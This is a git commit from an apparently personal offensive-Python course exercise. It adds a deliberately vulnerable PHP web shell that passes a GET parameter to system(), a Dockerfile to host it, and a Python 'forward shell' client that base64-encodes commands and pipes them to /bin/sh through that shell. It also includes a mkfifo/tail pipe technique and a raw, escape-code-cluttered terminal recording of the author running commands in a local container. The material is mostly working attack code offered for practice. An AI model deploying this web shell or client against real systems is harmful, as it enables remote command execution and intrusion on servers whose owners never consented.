This commit is contained in:
Manuel Vergara 2024-02-02 23:02:37 +01:00
parent 0d95645a93
commit 5d7e3302c5
4 changed files with 230 additions and 0 deletions

View File

@ -0,0 +1,5 @@
FROM php:7.0-apache
COPY index.php /var/www/html/
EXPOSE 80

View File

@ -0,0 +1,5 @@
<?php
system($_GET['cmd']);
?>

View File

@ -0,0 +1,51 @@
#!/usr/bin/env python3
"""
Forward Shell
Comandos para reverse shell:
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
mkfifo input; tail -f input | /bin/sh 2>&1 > output
"""
import requests
import signal
import sys
from termcolor import colored
from base64 import b64encode
def def_handler(sig, frame):
print(colored("\n[!] Exiting...", "blue"))
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
main_url = "http://localhost/index.php"
def run_command(command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
}
r = requests.get(main_url, params=data)
return r.text
if __name__ == '__main__':
while True:
command = input(colored("> ", "yellow"))
output_command = run_command(command)
print(output_command)

View File

@ -0,0 +1,169 @@
Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"]
 
7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04
 [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%  
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES at ⚡ 18:20:04
 [?1h=[?25h[?2004h[?25l 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115[?25h[?25l 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l  script/[?25h
]2;script/]1;script/% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:09
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l  #!/usr/bin/env python3[?25h
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:30
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat rdshell.py[?1l>[?25l[?2004l  code forwardshell.py[?25h
]2;code forwardshell.py]1;code% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:44
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;pywww-data
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:23:42
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> cat
/
^CTraceback (most recent call last):
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in <module>
output_command = run_command(command)
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command
r = requests.get(main_url, params=data)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get
return request("get", url, params=params, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse
response.begin()
File "/usr/lib/python3.10/http/client.py", line 318, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.10/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.10/socket.py", line 705, in readinto
return self._sock.recv_into(b)
KeyboardInterrupt
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕ main ?1
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> whoami
www-data
> cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 2f2f81768a05
> pwd
/var/www/html
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> ls
index.php
> e ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:36
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hppy forwardshell.pyph                php --interactive[?1l>[?25l[?2004l  php --interactive[?25h
]2;php --interactive]1;phpzsh: command not found: php
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:36:56
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hdd exec -it 2f2 bashdo                 cker portdocckkedocker e   xec -it 0fc1 shxec -it 0fc1 sh[?1l>[?25l[?2004l  docker exec -it 0fc1 sh[?25h
]2;docker exec -it 0fc1 sh]1;dockerError response from daemon: No such container: 0fc1
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:37:09
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hddocker exec -it 0fc1 shd                      exec -it 2f2 bashexec -it 2f2 bash[?1l>[?25l[?2004l  d exec -it 2f2 bash[?25h
]2;docker exec -it 2f2 bash]1;droot@2f2f81768a05:/var/www/html# php --version
PHP 7.0.33 (cli) (built: Dec 29 2018 06:50:58) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
root@2f2f81768a05:/var/www/html# php --interactive
Interactive shell
php > exit
root@2f2f81768a05:/var/www/html# e exit
exit
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 1m 55s 🔒 ES vpn at ⚡ 18:39:09
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir scriptmkmkddimkdir c     atch-all/01_scripts_descifrador_wargame.pyi                                         bnc    atch-all/01_scripts_descifrador_wargame.pyo                                         mandos-peladon            cepto[?1l>[?25l[?2004l  mkdir concepto[?25h
]2;mkdir concepto]1;mkdir% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:33
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hllsls[?1l>[?25l[?2004l  ls[?25h
]2;ls --color=tty]1;lsconcepto forwardshell.py
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:33
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hccode forwardshell.pycocon                 catenadas="hola $kease"ncce                     epconcepto/o [?1l>[?25l[?2004l  concepto[?25h
]2;concepto]1;concepto% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:36
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir conceptomkmkf           ifo --helpfiifmkfifo i     npyt;    ut;t  ttaaitail -f inop  put | //bbi/binn//bin/s/bin/sh 22>>&1 Z > ouputtput[?1l>[?25l[?2004l  mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h
]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifo^C
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1 х INT took 7m 34s 🔒 ES vpn at ⚡ 18:48:03
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcconceptoca      t ../09_keylogger/.env | pbcopycat o                            utput.pcap | wc -louutput              [?1l>[?25l[?2004l  cat output[?25h
]2;cat output]1;catv
/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto
/home/v
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1  🔒 ES vpn at ⚡ 18:48:11
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcat outputls       cat outputecho "whoami" > inputcat output         ls       cat outputecho "pwd" > inputcat output       ls       cat outputecho "whoami" > inputcat output         ls       cat outputls       cat output         mmkfifo input; tail -f input | /bin/sh 2>&1 > outputmkmkd                                                ir conceptomk            fifo input; tail -f input | /bin/sh 2>&1 > outputmkfmkfifo input; tail -f input | /bin/sh 2>&1 > output[?1l>[?25l[?2004l  mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h
]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifomkfifo: no sha pogut crear la cua FIFO 'input': El fitxer ja existeix
/bin/sh: 5: probando: not found
^C
Session terminated, killing shell...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1 х INT took 4m 51s 🔒 ES vpn at ⚡ 18:53:13
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h ...killed.
[?25l  [?25h[?2004l
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h 
🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38
 🏠 192.168.1.112 📡 192.145.39.54eecho "whoami" > inputex                   itexiexit[?1l>[?25l[?2004l  exit[?25h
]2;exit]1;exit
Script done on 2024-02-02 23:00:00+01:00 [COMMAND_EXIT_CODE="130"]